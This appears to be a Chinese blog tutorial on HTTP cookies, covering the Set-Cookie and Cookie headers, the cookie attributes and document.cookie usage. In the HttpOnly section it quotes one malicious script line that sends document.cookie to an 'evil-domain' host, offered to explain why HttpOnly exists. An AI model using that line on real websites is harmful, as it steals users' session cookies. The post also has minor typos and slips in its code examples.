cookie

作者: woow_wu7 | 来源:发表于2018-04-22 23:28 被阅读24次

cookie

(一) cookie概述

Cookie 是服务器保存在浏览器的一小段文本信息,每个 Cookie 的大小一般不能超过4KB。浏览器每次向服务器发出请求,就会自动附上这段信息。

  • cookie是服务器保存在浏览器的一小段文本信息
  • 浏览器每次向服务器发出请求,就会自动附上这段信息

cookie的主要作用

cookie的主要作用:

  • 分辨两个请求,是否来自同一个浏览器
  • 保存一些状态信息 (登陆信息,购物车信息,颜色,字体,等)

查看浏览器是否打开cookie功能

window.navigator.cookieEnabled属性返回一个布尔值,表示浏览器是否打开 Cookie 功能。

window.navigator.cookieEnabld    // 返回一个布尔值,表示浏览器是否打开cookie功能

document.cookie


返回当前网页的cookie

document.cookie








cookie的生成 ------------------- http回应头信息

服务器如果希望在浏览器保存 Cookie,就要在 HTTP 回应的头信息里面,放置一个Set-Cookie字段。

  • 服务器如果想在浏览器中保存cookie,就要在HTTP回应的头部信息里,放置一个 Set-Cookie字段
  • HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie。
  • 除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性
  • 一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。
  • 如果服务器想改变一个早先设置的 Cookie,必须同时满足个条件:Cookie 的key、domain、path和secure都匹配。只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。

Set-Cookie:foo=bar                        // 在http回应 的头部信息里面设置

上面代码会在浏览器保存一个名为foo的 Cookie,它的值为bar




------------------------------------------

HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco            // http回应的头部中可以有多个Set-Cookie
Set-Cookie: tasty_cookie=strawberry

[page content]




------------------------------------------

除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性

Set-Cookie: <cookie-name>=<cookie-value>; Expires=<date>     // expires属性,失效时间,GMT格式
Set-Cookie: <cookie-name>=<cookie-value>; Max-Age=<non-zero-digit>   // Max-age有效时长
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>   // 域名
Set-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>   // 路径
Set-Cookie: <cookie-name>=<cookie-value>; Secure   // 安全,只有https协议下可以发送cookie到服务器
Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly   // 指定cookie无法通过js脚本拿到





------------------------------------------

一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly






------------------------------------------

如果服务器想改变一个早先设置的 Cookie,必须同时满足四个条件:Cookie 的key、domain、path和secure都匹配


Set-Cookie: key1=value1; domain=example.com; path=/blog    【【【 原始的Cookie 】】】


改变上面这个 Cookie 的值,就必须使用同样的Set-Cookie


Set-Cookie: key1=value2; domain=example.com; path=/blog    【【【 服务器改变Cookie 】】】


// 【浏览器改变cookie】必须设置 Expires 为过去的时间





-------------------------------------------------------------------------------

只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。

Set-Cookie: key1=value2; domain=example.com; path=/

上面的命令设置了一个全新的同名 Cookie,但是path属性不一样。

下一次访问example.com/blog的时候,浏览器将向服务器发送两个同名的 Cookie。

----

Cookie: key1=value1; key1=value2

上面代码的两个 Cookie 是同名的,匹配越精确的 Cookie 排在越前面。



cookie的发送 ------------------- http请求头信息

浏览器向服务器发送 HTTP 请求时,每个请求都会带上相应的 Cookie。也就是说,把服务器早前保存在浏览器的这段信息,再发回服务器。这时要使用 HTTP 头信息的Cookie字段。

  • cookie的发送,使用 HTTP头信息的 Cookie 字段
  • Cookie字段可以包含多个 Cookie,使用分号(;)分隔。
  • 服务器收到浏览器发来的 Cookie 时,有两点是无法知道的:
    (1) Cookie 的各种属性,比如何时过期。
    (2) 哪个域名设置的 Cookie,到底是一级域名设的,还是某一个二级域名设的

Cookie: foo=bar

上面代码会向服务器发送名为foo的 Cookie,值为bar。



---------------------------------



Cookie字段可以包含多个 Cookie,使用分号(;)分隔。

Cookie: name=value; name2=value2; name3=value3


---------------------------------


GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry









生成cookie-响应头;发送cookie-请求头

cookie注意事项

  • 浏览器可以设置不接受 Cookie,也可以设置不向服务器发送 Cookie。

  • 浏览器的同源政策规定,两个网址只要域名相同和端口相同,就可以共享 Cookie
    注意,这里不要求协议相同。也就是说,http://example.com设置的 Cookie,可以被https://example.com读取。

  • Cookie 由 HTTP 协议生成,也主要是供 HTTP 协议使用。



(二) cookie的属性

Expires

expires属性指定一个具体的到期时间,到了指定的时间后,浏览器将不再保留这个cookie
expires的值是UTC格式,可以使用 Date.prototype.toUTCString() 进行格式转换

  • expires:失效,到期,的意思
  • 如果不设置 expires 属性,或者设为null,Cookie只在当前会话(session)有效,浏览器窗口一旦关闭,当前 Session 结束,该 Cookie 就会被删除。
  • 浏览器是根据本地时间,决定 cookie 是否过期,由于本地时间是不精确的,所以没有办法保证 cookie 一定会在服务器指定的时间过期

Max-Age

Max-Age属性 指定从现在开始,cookie存在的秒数,过了这个时间后,浏览器将不会保留这个cookie

Expires 和 Max-Age

如果同时指定了 Expires 和 Max-Age ,那么 Max-Age 将优先生效

Domain

Domain 属性指定,浏览器发出HTTP请求时,哪些域名要附带这个Cookie

  • domain:是域名,领土的意思
  • 如果没有指定Domain属性,浏览器将默认将其设为当前URL的一级域名
    比如www.example.com会设为example.com,而且以后如果访问example.com的任何子域名,HTTP 请求也会带上这个 Cookie。
  • 如果服务器在Set-Cookie字段指定的域名,不属于当前域名,浏览器会拒绝这个 Cookie。

Path

Path 属性指定,浏览器发出HTTP请求时,哪些路径要附带这个Cookie

  • 只要浏览器发现,Path属性是 HTTP 请求路径的开头一部分,就会在头信息里面带上这个 Cookie。
    比如,PATH属性是/,那么请求/docs路径也会包含该 Cookie。当然,前提是域名必须一致。

Secure

Secure 属性指定,浏览器只有在加密协议 HTTPS 下,才能将这个 Cookie 发送到服务器。

  • Secure:是安全的意思
  • 如果当前协议是 HTTP,浏览器会自动忽略服务器发来的Secure属性。该属性只是一个开关,不需要指定值。如果通信是 HTTPS 协议,该开关自动打开。

HttpOnly ------------------ 重要

  • HttpOnly属性指定该 Cookie 无法通过 JavaScript 脚本拿到,主要是Document.cookie属性、XMLHttpRequest对象和 Request API 都拿不到该属性。这样就防止了该 Cookie 被脚本读到,只有浏览器发出 HTTP 请求时,才会带上该 Cookie。

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

上面是跨站点载入的一个恶意脚本的代码,能够将当前网页的 Cookie 发往第三方服务器。

如果设置了一个 Cookie 的HttpOnly属性,上面代码就不会读到该 Cookie。

document.cookie

document.cookie属性用于读写当前网页的 Cookie。

  • 读取的时候,它会返回当前网页的所有 Cookie,前提是该 Cookie 不能有HTTPOnly属性。多个cookie之间,用 ; 分号分隔
  • document.cookie属性是可写的,可以通过它为当前网站添加 Cookie。
  • 写入的时候,Cookie 的值必须写成key=value的形式( 注意,等号两边不能有空格 )
  • 写入 Cookie 的时候,必须对分号、逗号和空格进行转义(它们都不允许作为 Cookie 的值),这可以用encodeURIComponent方法达到。
  • document.cookie一次只能写入一个 Cookie,而且写入并不是覆盖,而是添加。
添加cookie

document.cookie = 'name=wang'    // key=value的字符串

document.cookie = 'test1=hello';
document.cookie = 'test2=world';
document.cookie
// test1=hello;test2=world



document.cookie读写行为的差异:

(一次可以读出全部 Cookie,但是只能写入一个 Cookie),与 HTTP 协议的 Cookie 通信格式有关。

浏览器向服务器发送 Cookie 的时候,Cookie字段是使用一行将所有 Cookie 全部发送;

服务器向浏览器设置 Cookie 的时候,Set-Cookie字段是一行设置一个 Cookie。

  • 写入 Cookie 的时候,可以一起写入 Cookie 的属性。

document.cookie = "foo=bar; expires=Fri, 31 Dec 2020 23:59:59 GMT";


上面代码中,写入 Cookie 的时候,同时设置了expires属性。属性值的等号两边,也是不能有空格的。

各个属性的写入注意点如下。

各个属性的写入注意点如下。

  • path属性必须为绝对路径,默认为当前路径。
  • domain属性值必须是当前发送 Cookie 的域名的一部分。比如,当前域名是-
    example.com,就不能将其设为foo.com。该属性默认为当前的一级域名(不含二级域名)。
  • max-age属性的值为秒数。
  • expires属性的值为 UTC 格式,可以使用Date.prototype.toUTCString()进行日期格式转换。

document.cookie = 'fontSize=14; '
  + 'expires=' + someDate.toGMTString() + '; '
  + 'path=/subdirectory; '
  + 'domain=*.example.com';

删除一个cookie的值

  • 删除一个现存 Cookie 的唯一方法,是设置它的expires属性为一个过去的日期

添加cookie: 
document.cookie = 'name=wu'


删除cookie:
document.cookie = 'name=wu;expires=Thu, 01-Jan-1970 00:00:01 GMT';


上面代码中,名为fontSize的 Cookie 的值为wu,过期时间设为1970年1月1月零点,就等同于删除了这个 Cookie。

相关文章

网友评论

    本文标题:cookie

    本文链接:https://www.haomeiwen.com/subject/pxcclftx.html